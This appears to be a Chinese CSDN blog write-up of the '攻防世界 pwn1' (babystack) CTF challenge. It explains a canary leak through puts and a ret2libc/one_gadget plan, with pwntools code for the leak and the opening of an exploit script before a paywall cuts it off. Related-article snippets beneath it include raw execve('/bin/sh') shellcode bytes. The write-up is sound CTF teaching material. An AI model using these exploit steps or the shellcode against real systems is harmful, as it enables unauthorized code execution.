攻防世界进阶区pwn1

最新推荐文章于 2024-04-04 21:12:24 发布
最新推荐文章于 2024-04-04 21:12:24 发布
阅读量299 收藏
点赞数
分类专栏: 攻防世界 CTF
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45461609/article/details/106583885
版权

拿到题目checksec一下,发现开了canary保护。
在这里插入图片描述
分析源程序,也很容易找到溢出点,题目开了canary,很显然v6就是canary,s与v6的距离为0x90-0x8=0x88.题目得逻辑也很简单,输入1进行read操作,2进行puts,3退出。在这里插入图片描述
那么思路就很清楚了,通过read填充0x88个a,然后通过puts打印,因为puts碰到\x00才会停止打印,
那么就会有疑惑了,众所周知canary的最后一个字节为\x00,那打印0x88个’a’之后不是直接停止打印了吗?后来用gdb看了一下发现canary的最后一个字节被填充成了0x0a(换行符)

输入a之前
在这里插入图片描述
输入a之后
在这里插入图片描述
也就是说如果puts的话我们的canary会完整的打印下来(最后一个字节不要,因为最后一个字节应该是\x00)
获取canary:

r.sendlineafter('>> ', '1')
sleep(0.5)
r.sendline('a'*0x88)
r.sendlineafter('>> ', '2')
r.recvuntil('a\n')
canary = u64('\x00'+ r.recv(7))

获得canary之后,我们就可以利用刚开始发现的栈溢出漏洞了。
需要注意的是,题目给的libc有点问题,用正常的ret2libc调用给的libc库构造system("/bin/sh")的方法行不通。我找到了三种方法1.将"/bin/sh"改成"/sh\0",2.使用LibcSearcher打远程,3.使用题目提供的libc库找one_gadget
exp1:

from pwn import*

#r = process('./babystack')
r = remote('')
elf = ELF('./babystack')
libc = ELF('./libc-2.23.so')

pop_rdi = 0x400a93
main = 0x400908
one_gadget = 0x45216

r.sendlineafter
最低0.47元/天 解锁文章
3nc0de
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界——pwn(1)
weixin_44319142的博客
04-08 2855
get_shell
攻防世界--pwn1
qq_73149934的博客
02-22 491
canary,ret2libc 注意:只能打通远端,且libc中的systembinsh没用,用onegadget打通,在用onegadget时,注意rax需要为0,通过汇编看出选择3.exit退出时rax清0,可以onegadget Exp she_i386_20=b"\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80" she_amd64_30=b"\x48\x31\xd2\x48\xbb
攻防世界pwn——pwn1
qq_62076255的博客
12-21 438
做题记录
pwn--攻防世界 pwn1
最新发布
A13837377363的博客
04-04 465
canary一般是以'\x00'结尾,但是由于小端序存储,我们会先遇到'\x00',这里使用sendline自动添加的'\n'掩盖'\x00'。思路形成:先读出canary,再读出main函数的返回地址,计算出libc的基址,因为只能填入一个地址,所以就想到one_gadget。观察保护和源码,有canary保护,并且只能溢出8字节,也就是一个地址。我使用的是python3,可能由于python版本问题,我运行的时候要将。然后是读取main函数的返回地址,与这个类似,就不赘述。一个非常便捷的工具。
攻防世界 -pwn1
TedLau的博客
04-22 905
0x00 前言 首次做到跟canary绕过有关的知识,就准备写点东西记录下。 64位,保护几乎全开了。不慌,慌也没用。 0x10 分析 运行可以发现几个功能,就是说:1选项是保存你将要输入的内容,2就是打印你之前输入的内容,3就是退出。 0x11 ida分析 main函数 在main函数中发现了canary, canary的值在程序每一次运行都是会改...
攻防世界 pwn1
10-25 967
1 题目 2 分析 流程很简单,提供三个功能,store print quit。store功能存在明显的溢出点: 接下来就是利用溢出点,将代码转跳到system方法执行即可。所以接下来的就要通过构造ROP将相对地址打印出来,然后溢出one_gadget.exp如下: from pwn import * from LibcSearcher import * io = remote("220.249.52.133","38178") context.log_level = 'debug.
攻防世界pwn题:Recho.doc
07-13
攻防世界pwn题:Recho.doc 知识点总结 本文总结了攻防世界pwn题:Recho.doc的知识点,涵盖了二进制文件分析、栈溢出、ROP技术、libc泄露、系统调用等多个方面。 1. 二进制文件分析 攻防世界pwn题:Recho.doc是一...
攻防世界pwn题:forgot.doc
07-13
攻击防御世界pwn题:forgot.doc 本文档是关于攻击防御世界pwn题的Forgot.doc,涉及到有限状态自动机、正则表达式、电子邮件地址验证、Lua、IDA静态分析、canary和PIE保护机制、scanf函数溢出漏洞、栈溢出攻击、...
安恒杯pwn1
04-25
"安恒杯pwn1" 本文主要讨论的是安恒杯pwn1题目的解决方法。该题目是一个Pwn题目,利用了strcpy函数的栈溢出漏洞来获取shell。 首先,我们需要了解题目的基本信息。题目中提供了一个可执行文件pwn1,运行起来后显示...
level0 -- 攻防世界新手题
01-19
来自攻防世界的pwn题,是一道简单的新手样本题目,但由于不同linux的libc版本,会使得在ubuntu18.04以及ubuntu20.04中进行漏洞利用产生一些小问题。漏洞利用问题解决链接:...
pwn1 一道pwn练习题
05-07
pwn练习题
攻防世界pwn难度1
weixin_63282980的博客
11-05 1631
攻防世界难度1的题目WP
攻防世界babystack(pwn1)——glibc_all_in_one初体验
weixin_48066554的博客
05-14 1367
攻防世界babystack(pwn1)——glibc_all_in_one初体验 文章目录攻防世界babystack(pwn1)——glibc_all_in_one初体验引入初步分析1、checksec2、伪代码分析3、栈分析解题思路1、泄露canary3、get shellexp本地libc运行尝试尝试1尝试2尝试3尝试4(重大进展) 引入 ​ 好久没做pwn题了,找了道简单的ret2libc做做,顺便尝试解决一些历史遗留问题 (其实就是让pwn题使用本地的libc的问题,省流:有突破性进展但没有完全解决
[攻防世界 pwn]——pwn1(内涵peak小知识)
Y_peak的博客
02-28 604
[攻防世界 pwn]——pwn1 题目地址:https://adworld.xctf.org.cn/ 题目: peak小知识 这道题目的关键就是泄露canary,通常我们泄露canary有两种方法,遇见printf函数,并且有格式化字符串漏洞的我们可以直接计算偏移利用%{offest}$s,打印出来。当然也可以用 % {offest} $p直接打印出canary 的值。 遇见可以利用的栈溢出gets函数,如果有puts函数,或者printf("%s", **)的我们也可以直接泄露出来它。首先我们要清
攻防世界-pwn1-Writeup
SkYe's Blog
05-13 402
pwn1 考点:栈溢出,canary绕过 基本情况 程序实现功能是往栈上读写数据。 保护措施 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: No PIE (0x400000) 栈溢出 ...... while ( 1 ) { menu(); v3 = my_input(); switch ( v3 ) {
攻防世界)(pwn)pwn1(厦门邀请赛)babystack
PLpa的博客
07-21 2526
canary!canary!canary! 拿到题目,下载附件,查看保护。 可以很清楚的看到,程序开了canary,这就说明我们不能实现暴力的栈溢出,还要考虑这个canary的值。 我们首先运行一下程序: 可以很清楚的看出程序的功能,当我们选择1时,我们就可以输入,当我们选择2时,我们可以输出我们前面输入的东西。 进入IDA看源代码: 我们可以看到canary的值存放在v6里,v6距离rbp...
攻防世界 pwn1 wp
qq_43409582的博客
11-06 464
0x01 先看保护: 除了PIE全开了。 打开ida分析明显的栈溢出漏洞,然后再看一下题目逻辑1是输入2是输出3是退出 因为有canary保护所以要想办法泄露canary,回头看那个栈溢出漏洞,发现可以利用先发送0x88个a过去 后面会自动给你爆出canary,有了canary之后,就简单了,所以思路就是:先利用栈溢出漏洞获取canary,再利用拼接的方法将前面的填充补全之后就是rop了。这...
WUST-CTF2020(武汉科技大学第一届"WUST-CTF"网络安全竞赛)WP
weixin_45461609的博客
03-30 3557
WUST-CTF2020Webcheck inadmin(不会web勉强做出)PWNgetshellgetshell2number gameCrypto大数运算B@se情书babyrsa佛说:只能四天MISC比赛规则Space ClubWelcomegirlfriend爬ShopRECr0ssFunlevel1level2level3 Web check in 修改maxlength,删除按钮的d...
攻防世界 pwn repeater
09-13
攻防世界是一个CTF竞赛平台,其中包含了各种类型的题目,包括pwn和repeater题目。根据引用中提到的信息,攻防世界标记的难度可能不准确。这可能是因为题目的实际难度与标记的难度不一致,导致出现了这种情况。 至于...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值